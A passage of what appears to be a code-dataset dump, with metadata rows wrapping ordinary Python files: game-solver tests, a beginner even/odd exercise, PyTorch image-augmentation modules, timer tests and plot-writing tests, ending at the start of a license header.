| 0
|
0
| 7
|
65cb238608ce766642b798e676267ace846dd7f0
| 2,564
|
py
|
Python
|
modules/simple_wires/test_solver.py
|
Ao-Re/keep-typing-and-nobody-explodes
|
deff70c384b3271315acd49bcbfd62c05ed9a7ce
|
[
"MIT"
] | null | null | null |
modules/simple_wires/test_solver.py
|
Ao-Re/keep-typing-and-nobody-explodes
|
deff70c384b3271315acd49bcbfd62c05ed9a7ce
|
[
"MIT"
] | null | null | null |
modules/simple_wires/test_solver.py
|
Ao-Re/keep-typing-and-nobody-explodes
|
deff70c384b3271315acd49bcbfd62c05ed9a7ce
|
[
"MIT"
] | 2
|
2020-10-04T17:04:31.000Z
|
2020-10-20T16:59:50.000Z
|
import unittest
from .solver import solve_simple_wires
class TestSimpleWireSolver(unittest.TestCase):
    """Unit tests for solve_simple_wires over 3- to 6-wire layouts.

    Each case passes a list of wire colours plus a boolean flag to the
    solver and checks the returned instruction string. (The flag is the
    solver's second input — presumably a serial-number property; confirm
    against the solver's documentation.)

    Fix: the locals were named `input`, shadowing the builtin — renamed
    to `wires`.
    """

    def test_ThreeWires(self):
        wires = ['yellow', 'yellow', 'black']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the second wire')
        wires = ['yellow', 'red', 'white']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the last wire')
        wires = ['blue', 'red', 'blue']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the last blue wire')
        wires = ['white', 'white', 'red']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the last wire')

    def test_FourWires(self):
        wires = ['red', 'red', 'yellow', 'yellow']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the last red wire')
        wires = ['white', 'black', 'yellow', 'yellow']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the first wire')
        wires = ['white', 'black', 'yellow', 'blue']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the first wire')
        wires = ['white', 'yellow', 'yellow', 'white']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the last wire')
        wires = ['white', 'yellow', 'black', 'white']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the second wire')

    def test_FiveWires(self):
        wires = ['red', 'blue', 'yellow', 'red', 'black']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the fourth wire')
        wires = ['red', 'blue', 'yellow', 'blue', 'yellow']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the first wire')
        wires = ['red', 'blue', 'yellow', 'red', 'white']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the second wire')
        wires = ['black', 'blue', 'yellow', 'red', 'white']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the first wire')

    def test_SixWires(self):
        wires = ['red', 'blue', 'red', 'red', 'black', 'red']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the third wire')
        wires = ['red', 'white', 'yellow', 'white', 'black', 'red']
        self.assertEqual(solve_simple_wires(wires, True), 'Cut the fourth wire')
        wires = ['blue', 'blue', 'blue', 'white', 'black', 'white']
        self.assertEqual(solve_simple_wires(wires, False), 'Cut the last wire')
        wires = ['blue', 'blue', 'blue', 'red', 'black', 'white']
        self.assertEqual(solve_simple_wires(wires, False), 'Cut the fourth wire')

    def test_Invalid(self):
        # Fewer than three wires is outside the module's rules.
        wires = ['red']
        self.assertEqual(solve_simple_wires(wires, True), 'Invalid')
| 55.73913
| 83
| 0.646646
| 324
| 2,564
| 4.984568
| 0.108025
| 0.129412
| 0.188235
| 0.289783
| 0.780186
| 0.726316
| 0.713313
| 0.713313
| 0.683591
| 0.683591
| 0
| 0
| 0.178237
| 2,564
| 45
| 84
| 56.977778
| 0.766493
| 0
| 0
| 0.272727
| 0
| 0
| 0.2617
| 0
| 0
| 0
| 0
| 0
| 0.409091
| 1
| 0.113636
| false
| 0
| 0.045455
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65eca2b219128d394778fff4d8481c6dbf03510d
| 383
|
py
|
Python
|
desafios/desafio030.py
|
genisyskernel/cursoemvideo-python
|
dec301e33933388c886fe78010f38adfb24dae82
|
[
"MIT"
] | 1
|
2020-10-26T04:33:14.000Z
|
2020-10-26T04:33:14.000Z
|
desafios/desafio030.py
|
genisyskernel/cursoemvideo-python
|
dec301e33933388c886fe78010f38adfb24dae82
|
[
"MIT"
] | null | null | null |
desafios/desafio030.py
|
genisyskernel/cursoemvideo-python
|
dec301e33933388c886fe78010f38adfb24dae82
|
[
"MIT"
] | null | null | null |
# Desafio 030: read an integer from the user and report whether it is even
# (PAR) or odd (IMPAR), using ANSI colour escapes for prompt and message.
numero_inteiro = int(input("\033[1;35mDigite um numero inteiro: \033[m"))
# Pick the label once, then emit a single formatted message (same bytes as
# printing two separate hard-coded variants).
paridade = "PAR" if numero_inteiro % 2 == 0 else "IMPAR"
print("\033[1;36mO numero\033[m \033[1;35m{0}\033[m \033[1;36me\033[m \033[1;35m{1}\033[m\033[1;36m!\033[m".format(numero_inteiro, paridade))
| 54.714286
| 137
| 0.684073
| 80
| 383
| 3.225
| 0.2625
| 0.170543
| 0.217054
| 0.248062
| 0.658915
| 0.658915
| 0.658915
| 0.658915
| 0.658915
| 0.658915
| 0
| 0.294286
| 0.086162
| 383
| 6
| 138
| 63.833333
| 0.442857
| 0
| 0
| 0
| 0
| 0.4
| 0.631854
| 0.193211
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65edf8942ed221dba6eb19240c5d997b4c53cabb
| 9,902
|
py
|
Python
|
torchreid/models/batch.py
|
Vill-Lab/IGOAS
|
42ca1d45e441f993c95b5e8f33c9f97ea3b916f3
|
[
"MIT"
] | 8
|
2021-05-27T10:19:28.000Z
|
2021-10-15T12:38:04.000Z
|
torchreid/models/batch.py
|
Vill-Lab/IGOAS
|
42ca1d45e441f993c95b5e8f33c9f97ea3b916f3
|
[
"MIT"
] | 3
|
2021-06-23T12:06:39.000Z
|
2021-09-12T08:40:44.000Z
|
torchreid/models/batch.py
|
Vill-Lab/IGOAS
|
42ca1d45e441f993c95b5e8f33c9f97ea3b916f3
|
[
"MIT"
] | 6
|
2021-05-27T10:19:18.000Z
|
2021-11-13T12:02:17.000Z
|
import random
from torch import nn
import math
class BatchCrop(nn.Module):
    """Crop one random rectangle (shared by the whole batch) and resize it
    back to a fixed (384, 128) spatial size with bilinear interpolation.

    The crop offset is resampled only every ``Threshold`` forward calls; in
    between, the cached ``(sx, sy)`` position is reused.  Identity when the
    module is in eval mode.
    """

    def __init__(self, p=0.5, sl=0.25, sh=0.75, r1=0.25, Threshold=1):
        super(BatchCrop, self).__init__()
        self.p = p    # kept for interface compatibility; unused because the
                      # random-skip gate below is commented out
        self.sl = sl  # lower bound of crop area as a fraction of h*w
        self.sh = sh  # upper bound of crop area as a fraction of h*w
        self.r1 = r1  # aspect ratio is drawn from [r1, 1/r1]
        self.it = 0   # forward-call counter
        self.Threshold = Threshold  # resample offset every `Threshold` calls
        self.sx = None  # cached crop top coordinate
        self.sy = None  # cached crop left coordinate

    def forward(self, x):
        # Fix: ``F`` was referenced without ever being imported in this
        # module, so training-mode forward always raised NameError.
        import torch.nn.functional as F

        if self.training:
            # if random.uniform(0, 1) > self.p:
            #     return x
            for attempt in range(100):
                h, w = x.size()[-2:]
                area = h * w
                target_area = random.uniform(self.sl, self.sh) * area
                aspect_ratio = random.uniform(self.r1, 1 / self.r1)
                rh = int(round(math.sqrt(target_area * aspect_ratio)))
                rw = int(round(math.sqrt(target_area / aspect_ratio)))
                if rw < w and rh < h:
                    if self.it % self.Threshold == 0:
                        self.sx = random.randint(0, h - rh)
                        self.sy = random.randint(0, w - rw)
                    self.it += 1
                    x_crop = x[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw]
                    x = F.interpolate(x_crop, (384, 128), mode='bilinear', align_corners=True)
                    return x
        return x
# class BatchDrop(nn.Module):
# def __init__(self, h_ratio=0.3, w_ratio=1, Threshold=1):
# super(BatchDrop, self).__init__()
# self.h_ratio = h_ratio
# self.w_ratio = w_ratio
# self.it = 0
# self.Threshold = Threshold
# self.sx = None
# self.sy = None
# def forward(self, x):
# if self.training:
# h, w = x.size()[-2:]
# rh = round(self.h_ratio * h)
# rw = round(self.w_ratio * w)
# if self.it % self.Threshold == 0:
# self.sx = random.randint(0, h - rh)
# self.sy = random.randint(0, w - rw)
# self.it += 1
# mask = x.new_ones(x.size())
# mask[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw] = 0
# x = x * mask
# return x
# return x
class BatchDrop(nn.Module):
    """Zero out one random rectangle, shared across the whole batch.

    The area fraction is drawn from [sl, sh] and the aspect ratio from
    [r1, 1/r1]; the rectangle position is resampled every ``Threshold``
    forward calls.  Identity when the module is in eval mode.
    """

    def __init__(self, sl=0.2, sh=0.5, r1=0.25, Threshold=1):
        super(BatchDrop, self).__init__()
        self.it = 0                 # forward-call counter
        self.Threshold = Threshold  # resample offset every `Threshold` calls
        self.sx = None              # cached rectangle top coordinate
        self.sy = None              # cached rectangle left coordinate
        # Fix: the original did ``self.mean = mean`` although this __init__
        # takes no ``mean`` argument, so every instantiation raised
        # NameError.  The attribute is never read in forward(), so the
        # assignment is simply removed.
        self.sl = sl  # lower bound of dropped area as a fraction of h*w
        self.sh = sh  # upper bound of dropped area as a fraction of h*w
        self.r1 = r1  # aspect ratio is drawn from [r1, 1/r1]

    def forward(self, x):
        if self.training:
            for attempt in range(100):
                h, w = x.size()[-2:]
                area = h * w
                target_area = random.uniform(self.sl, self.sh) * area
                aspect_ratio = random.uniform(self.r1, 1 / self.r1)
                rh = int(round(math.sqrt(target_area * aspect_ratio)))
                rw = int(round(math.sqrt(target_area / aspect_ratio)))
                if rw < w and rh < h:
                    if self.it % self.Threshold == 0:
                        self.sx = random.randint(0, h - rh)
                        self.sy = random.randint(0, w - rw)
                    self.it += 1
                    mask = x.new_ones(x.size())
                    mask[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw] = 0
                    x = x * mask
                    return x
        return x
class BatchErasing(nn.Module):
    """Paint one random rectangle (shared by the whole batch) with the
    per-channel ``mean`` values, in place.  The rectangle position is
    refreshed every ``Threshold`` forward calls; identity in eval mode.
    """

    def __init__(self, sl=0.2, sh=0.5, r1=0.25, mean=[0.4914, 0.4822, 0.4465], Threshold=1):
        super(BatchErasing, self).__init__()
        self.it = 0                 # forward-call counter
        self.Threshold = Threshold  # resample offset every `Threshold` calls
        self.sx = None              # cached rectangle top coordinate
        self.sy = None              # cached rectangle left coordinate
        self.mean = mean            # per-channel fill values
        self.sl = sl                # area fraction lower bound
        self.sh = sh                # area fraction upper bound
        self.r1 = r1                # aspect ratio drawn from [r1, 1/r1]

    def forward(self, x):
        if not self.training:
            return x
        for _ in range(100):
            height, width = x.size()[-2:]
            erase_area = random.uniform(self.sl, self.sh) * (height * width)
            ratio = random.uniform(self.r1, 1 / self.r1)
            rect_h = int(round(math.sqrt(erase_area * ratio)))
            rect_w = int(round(math.sqrt(erase_area / ratio)))
            if rect_w < width and rect_h < height:
                if self.it % self.Threshold == 0:
                    self.sx = random.randint(0, height - rect_h)
                    self.sy = random.randint(0, width - rect_w)
                self.it += 1
                # Fill each channel of the rectangle with its mean value.
                for channel in range(3):
                    x[:, channel, self.sx:self.sx + rect_h, self.sy:self.sy + rect_w] = self.mean[channel]
                return x
        return x
# class BatchChange(nn.Module):
# def __init__(self, choose, sl=0.25, sh=0.75, r1=0.25, mean=[0.4914, 0.4822, 0.4465], Threshold=1):
# super(BatchChange, self).__init__()
# self.it = 0
# self.Threshold = Threshold
# self.sx = None
# self.sy = None
# self.mean = mean
# self.sl = sl
# self.sh = sh
# self.r1 = r1
# self.choose = choose
# def forward(self, x):
# if self.training:
# h, w = x.size()[-2:]
# area = h * w
# target_area = random.uniform(self.sl, self.sh) * area
# aspect_ratio = random.uniform(self.r1, 1/self.r1)
# for attempt in range(100):
# rh = int(round(math.sqrt(target_area * aspect_ratio)))
# rw = int(round(math.sqrt(target_area / aspect_ratio)))
# if rw < w and rh < h:
# if self.it % self.Threshold == 0:
# self.sx = random.randint(0, h - rh)
# self.sy = random.randint(0, w - rw)
# self.it += 1
# if self.choose == 0:
# # print(self.choose)
# mask = x.new_zeros(x.size())
# mask[:, :, self.sx:self.sx + rh, self.sy:self.sy + rw] = 1
# x = x * mask
# return x
# if self.choose == 1:
# # print(self.choose)
# x[:, 0, 0:self.sx , :] = self.mean[0]
# x[:, 0, self.sx + rh:h , :] = self.mean[0]
# x[:, 0, self.sx :self.sx+rh , 0:self.sy] = self.mean[0]
# x[:, 0, self.sx :self.sx+rh , self.sy+rw:w] = self.mean[0]
# x[:, 1, 0:self.sx , :] = self.mean[1]
# x[:, 1, self.sx + rh:h , :] = self.mean[1]
# x[:, 1, self.sx :self.sx+rh , 0:self.sy] = self.mean[1]
# x[:, 1, self.sx :self.sx+rh , self.sy+rw:w] = self.mean[1]
# x[:, 2, 0:self.sx , :] = self.mean[2]
# x[:, 2, self.sx + rh:h , :] = self.mean[2]
# x[:, 2, self.sx :self.sx+rh , 0:self.sy] = self.mean[2]
# x[:, 2, self.sx :self.sx+rh , self.sy+rw:w] = self.mean[2]
# return x
# return x
class RandomErasing(nn.Module):
    """Per-image random erasing: for each sample in the batch, pick one
    random rectangle and overwrite it with the per-channel ``mean`` values
    (only applied when the input has exactly 3 channels).  In place.
    """

    def __init__(self, sl=0.1, sh=0.4, r1=0.3, mean=[0.4914, 0.4822, 0.4465]):
        super(RandomErasing, self).__init__()
        self.mean = mean  # per-channel fill values
        self.sl = sl      # area fraction lower bound
        self.sh = sh      # area fraction upper bound
        self.r1 = r1      # aspect ratio drawn from [r1, 1/r1]

    def forward(self, img):
        # One independent rectangle per sample; up to 100 attempts each to
        # find a rectangle that fits inside the image.
        for idx in range(img.size(0)):
            for _ in range(100):
                full_area = img.size()[2] * img.size()[3]
                erase_area = random.uniform(self.sl, self.sh) * full_area
                ratio = random.uniform(self.r1, 1 / self.r1)
                eh = int(round(math.sqrt(erase_area * ratio)))
                ew = int(round(math.sqrt(erase_area / ratio)))
                if ew < img.size()[3] and eh < img.size()[2]:
                    top = random.randint(0, img.size()[2] - eh)
                    left = random.randint(0, img.size()[3] - ew)
                    if img.size()[1] == 3:
                        for channel in range(3):
                            img[idx, channel, top:top + eh, left:left + ew] = self.mean[channel]
                    break
        return img
class RandomDrop(nn.Module):
    """Per-image random dropping: zero out one random rectangle in every
    sample of the batch (only applied to 3-channel inputs).  In place.
    """

    def __init__(self, sl=0.1, sh=0.4, r1=0.3, mean=[0.4914, 0.4822, 0.4465]):
        super(RandomDrop, self).__init__()
        self.mean = mean  # kept for interface parity; unused when dropping
        self.sl = sl      # area fraction lower bound
        self.sh = sh      # area fraction upper bound
        self.r1 = r1      # aspect ratio drawn from [r1, 1/r1]

    def forward(self, img):
        # One independent rectangle per sample; up to 100 attempts each.
        for idx in range(img.size(0)):
            for _ in range(100):
                full_area = img.size()[2] * img.size()[3]
                drop_area = random.uniform(self.sl, self.sh) * full_area
                ratio = random.uniform(self.r1, 1 / self.r1)
                dh = int(round(math.sqrt(drop_area * ratio)))
                dw = int(round(math.sqrt(drop_area / ratio)))
                if dw < img.size()[3] and dh < img.size()[2]:
                    top = random.randint(0, img.size()[2] - dh)
                    left = random.randint(0, img.size()[3] - dw)
                    if img.size()[1] == 3:
                        img[idx, :, top:top + dh, left:left + dw] = 0
                    break
        return img
| 39.608
| 104
| 0.444961
| 1,305
| 9,902
| 3.295019
| 0.066667
| 0.058605
| 0.062791
| 0.036279
| 0.893721
| 0.870465
| 0.857674
| 0.83186
| 0.812326
| 0.799302
| 0
| 0.05568
| 0.414159
| 9,902
| 250
| 105
| 39.608
| 0.685571
| 0.354474
| 0
| 0.789855
| 0
| 0
| 0.001268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0
| 0.021739
| 0
| 0.188406
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02ba82b3c576487aff198bb2ea47f2e9f06e8f5d
| 152
|
py
|
Python
|
tests/sources/python-config-output.py
|
hugovk/python-versions
|
c27507421a8edf9cfe1817c0615054bf6c7211b6
|
[
"MIT"
] | 92
|
2020-04-17T22:04:56.000Z
|
2022-03-11T19:19:45.000Z
|
tests/sources/python-config-output.py
|
Yuriy-Kukushkin/python-versions
|
ae216d3a0bc2b7e26696e35b476b4ef1e8e55b36
|
[
"MIT"
] | 18
|
2020-04-27T06:17:15.000Z
|
2022-01-18T17:25:41.000Z
|
tests/sources/python-config-output.py
|
Yuriy-Kukushkin/python-versions
|
ae216d3a0bc2b7e26696e35b476b4ef1e8e55b36
|
[
"MIT"
] | 77
|
2020-05-01T22:59:35.000Z
|
2022-03-20T08:38:58.000Z
|
# Dump every build-time configuration variable Python exposes, first from the
# modern `sysconfig` module and then from the legacy distutils copy, so the
# two outputs can be compared side by side.
import distutils.sysconfig
import sysconfig
from pprint import pprint

for config_source in (sysconfig, distutils.sysconfig):
    pprint(config_source.get_config_vars())
| 25.333333
| 45
| 0.855263
| 20
| 152
| 6.3
| 0.4
| 0.285714
| 0.285714
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 152
| 6
| 45
| 25.333333
| 0.887324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
b86a88d608b66c039e37a7cbfed14bb59c971731
| 784
|
py
|
Python
|
test/test_timer.py
|
rakesh-padwal/sumologic-collectd-plugin
|
336f1e87fa1a27777f2cb668cee71f307e6d380a
|
[
"Apache-2.0"
] | null | null | null |
test/test_timer.py
|
rakesh-padwal/sumologic-collectd-plugin
|
336f1e87fa1a27777f2cb668cee71f307e6d380a
|
[
"Apache-2.0"
] | null | null | null |
test/test_timer.py
|
rakesh-padwal/sumologic-collectd-plugin
|
336f1e87fa1a27777f2cb668cee71f307e6d380a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from sumologic_collectd_metrics.timer import Timer
def test_cancel_timer_normal():
    """Cancelling a started timer: the handle is set before the cancel."""
    t = Timer(0.1, task)
    t.start_timer()
    assert t.timer is not None
    t.cancel_timer()
def test_cancel_timer_not_start():
    """Cancelling before start: the handle is still unset and cancel is safe."""
    t = Timer(0.1, task)
    assert t.timer is None
    t.cancel_timer()
def test_reset_timer_normal():
    """Resetting a running timer keeps a live timer handle."""
    t = Timer(0.1, task)
    t.start_timer()
    assert t.timer is not None
    t.reset_timer()
    assert t.timer is not None
    t.cancel_timer()
def test_reset_timer_not_start():
    """Resetting an unstarted timer leaves the handle set afterwards."""
    t = Timer(0.1, task)
    assert t.timer is None
    t.reset_timer()
    assert t.timer is not None
    t.cancel_timer()
def task():
    """Trivial callback passed to Timer; just prints a marker line."""
    print('Timer task ... ')
| 16
| 50
| 0.674745
| 115
| 784
| 4.391304
| 0.2
| 0.19802
| 0.190099
| 0.213861
| 0.867327
| 0.819802
| 0.819802
| 0.819802
| 0.764356
| 0.764356
| 0
| 0.01473
| 0.220663
| 784
| 48
| 51
| 16.333333
| 0.811784
| 0.026786
| 0
| 0.72
| 0
| 0
| 0.019711
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.2
| false
| 0
| 0.04
| 0
| 0.24
| 0.04
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b889e166d1d975864c616ebbaea07770031c7f3f
| 7,392
|
py
|
Python
|
tests/plot/test_plot_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/plot/test_plot_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/plot/test_plot_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
from biosimulators_utils.plot import io
from biosimulators_utils.plot.data_model import PlotFormat
from biosimulators_utils.report.data_model import DataGeneratorResults
from biosimulators_utils.sedml.data_model import Plot2D, Curve, Plot3D, Surface, AxisScale, DataGenerator
import numpy
import os
import shutil
import tempfile
import unittest
class PlotIoTestCase(unittest.TestCase):
    """Tests for io.write_plot_2d / io.write_plot_3d.

    Each test builds a SED-ML plot definition plus matching data-generator
    results, writes the figure under a temporary directory, and asserts the
    expected PDF file was created.
    """

    def setUp(self):
        # Fresh scratch directory for every test.
        self.dirname = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.dirname)

    def test_write_plot_2d_one_curve(self):
        """2D plot with a single linear-linear curve (sin over time)."""
        time = DataGenerator(id='time')
        species_a = DataGenerator(id='species_a')
        plot = Plot2D(
            id='plot_1',
            curves=[
                Curve(
                    id='curve_1',
                    name='Curve 1',
                    x_data_generator=time,
                    y_data_generator=species_a,
                    x_scale=AxisScale.linear,
                    y_scale=AxisScale.linear,
                ),
            ]
        )
        data_gen_results = DataGeneratorResults()
        data_gen_results[time.id] = numpy.linspace(0., 10., 100 + 1)
        data_gen_results[species_a.id] = numpy.sin(data_gen_results[time.id])
        base_path = self.dirname
        rel_path = 'path/to/sim.sedml/' + plot.id
        # NOTE(review): `format` shadows the builtin; kept as-is here.
        format = PlotFormat.pdf
        io.write_plot_2d(plot, data_gen_results, base_path, rel_path, format=format)
        self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))

    def test_write_plot_2d_multiple_curves(self):
        """2D plot with two curves (sin and cos) sharing one x data generator."""
        time = DataGenerator(id='time')
        species_a = DataGenerator(id='species_a')
        species_b = DataGenerator(id='species_b')
        plot = Plot2D(
            id='plot_1',
            curves=[
                Curve(
                    id='curve_1',
                    name='Curve 1',
                    x_data_generator=time,
                    y_data_generator=species_a,
                    x_scale=AxisScale.linear,
                    y_scale=AxisScale.linear,
                ),
                Curve(
                    id='curve_2',
                    name='Curve 2',
                    x_data_generator=time,
                    y_data_generator=species_b,
                    x_scale=AxisScale.linear,
                    y_scale=AxisScale.linear,
                ),
            ]
        )
        data_gen_results = DataGeneratorResults()
        data_gen_results[time.id] = numpy.linspace(0., 10., 100 + 1)
        data_gen_results[species_a.id] = numpy.sin(data_gen_results[time.id])
        data_gen_results[species_b.id] = numpy.cos(data_gen_results[time.id])
        base_path = self.dirname
        rel_path = 'path/to/sim.sedml/' + plot.id
        format = PlotFormat.pdf
        io.write_plot_2d(plot, data_gen_results, base_path, rel_path, format=format)
        self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))

    def test_write_plot_2d_mixed_axes(self):
        """2D plot whose curves mix linear and log scales on both axes."""
        species_a = DataGenerator(id='species_a')
        species_b = DataGenerator(id='species_b')
        plot = Plot2D(
            id='plot_1',
            curves=[
                Curve(
                    id='curve_1',
                    name='Curve 1',
                    x_data_generator=species_a,
                    y_data_generator=species_a,
                    x_scale=AxisScale.linear,
                    y_scale=AxisScale.log,
                ),
                Curve(
                    id='curve_2',
                    name='Curve 2',
                    x_data_generator=species_b,
                    y_data_generator=species_b,
                    x_scale=AxisScale.log,
                    y_scale=AxisScale.linear,
                ),
            ]
        )
        data_gen_results = DataGeneratorResults()
        time = numpy.linspace(0., 10., 100 + 1)
        data_gen_results[species_a.id] = numpy.sin(time)
        data_gen_results[species_b.id] = numpy.cos(time)
        base_path = self.dirname
        rel_path = 'path/to/sim.sedml/' + plot.id
        format = PlotFormat.pdf
        io.write_plot_2d(plot, data_gen_results, base_path, rel_path, format=format)
        self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))

    def test_write_plot_3d_one_surface(self):
        """3D plot with one all-linear surface over a meshgrid."""
        x = DataGenerator(id='x')
        y = DataGenerator(id='y')
        species_a = DataGenerator(id='species_a')
        plot = Plot3D(
            id='plot_1',
            surfaces=[
                Surface(
                    id='surface_1',
                    name='Surface 1',
                    x_data_generator=x,
                    y_data_generator=y,
                    z_data_generator=species_a,
                    x_scale=AxisScale.linear,
                    y_scale=AxisScale.linear,
                    z_scale=AxisScale.linear,
                ),
            ]
        )
        # Standard matplotlib-style surface data: z = sin(sqrt(x^2 + y^2)).
        X = numpy.arange(-5, 5, 0.25)
        Y = numpy.arange(-5, 5, 0.25)
        X, Y = numpy.meshgrid(X, Y)
        Z = numpy.sin(numpy.sqrt(X**2 + Y**2))
        data_gen_results = DataGeneratorResults()
        data_gen_results[x.id] = X
        data_gen_results[y.id] = Y
        data_gen_results[species_a.id] = Z
        base_path = self.dirname
        rel_path = 'path/to/sim.sedml/' + plot.id
        format = PlotFormat.pdf
        io.write_plot_3d(plot, data_gen_results, base_path, rel_path, format=format)
        self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))

    def test_write_plot_3d_multiple_surfaces(self):
        """3D plot with two surfaces; the second swaps x/y and uses log scales."""
        x = DataGenerator(id='x')
        y = DataGenerator(id='y')
        species_a = DataGenerator(id='species_a')
        species_b = DataGenerator(id='species_b')
        plot = Plot3D(
            id='plot_1',
            surfaces=[
                Surface(
                    id='surface_1',
                    name='Surface 1',
                    x_data_generator=x,
                    y_data_generator=y,
                    z_data_generator=species_a,
                    x_scale=AxisScale.linear,
                    y_scale=AxisScale.linear,
                    z_scale=AxisScale.linear,
                ),
                Surface(
                    id='surface_2',
                    name='Surface 2',
                    x_data_generator=y,
                    y_data_generator=x,
                    z_data_generator=species_b,
                    x_scale=AxisScale.log,
                    y_scale=AxisScale.log,
                    z_scale=AxisScale.log,
                ),
            ],
        )
        X = numpy.arange(-5, 5, 0.25)
        Y = numpy.arange(-5, 5, 0.25)
        X, Y = numpy.meshgrid(X, Y)
        A = numpy.sin(numpy.sqrt(X**2 + Y**2))
        B = numpy.cos(numpy.sqrt(X**2 + Y**2))
        data_gen_results = DataGeneratorResults()
        data_gen_results[x.id] = X
        data_gen_results[y.id] = Y
        data_gen_results[species_a.id] = A
        data_gen_results[species_b.id] = B
        base_path = self.dirname
        rel_path = 'path/to/sim.sedml/' + plot.id
        format = PlotFormat.pdf
        io.write_plot_3d(plot, data_gen_results, base_path, rel_path, format=format)
        self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))
| 33.908257
| 105
| 0.540584
| 871
| 7,392
| 4.323766
| 0.092997
| 0.050186
| 0.100372
| 0.034519
| 0.842539
| 0.837759
| 0.831386
| 0.831386
| 0.788901
| 0.788901
| 0
| 0.018908
| 0.356061
| 7,392
| 217
| 106
| 34.064516
| 0.772269
| 0
| 0
| 0.741758
| 0
| 0
| 0.063312
| 0.018939
| 0
| 0
| 0
| 0
| 0.027473
| 1
| 0.038462
| false
| 0
| 0.049451
| 0
| 0.093407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b898e068680cc5214a74098985fe039b4239d651
| 55,268
|
py
|
Python
|
tests/typecode/test_contenttype.py
|
nicoddemus/scancode-toolkit
|
58dfec66faa2c8a90f1125861081266594a1e1d7
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
tests/typecode/test_contenttype.py
|
nicoddemus/scancode-toolkit
|
58dfec66faa2c8a90f1125861081266594a1e1d7
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
tests/typecode/test_contenttype.py
|
nicoddemus/scancode-toolkit
|
58dfec66faa2c8a90f1125861081266594a1e1d7
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
#
# Copyright (c) 2018 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
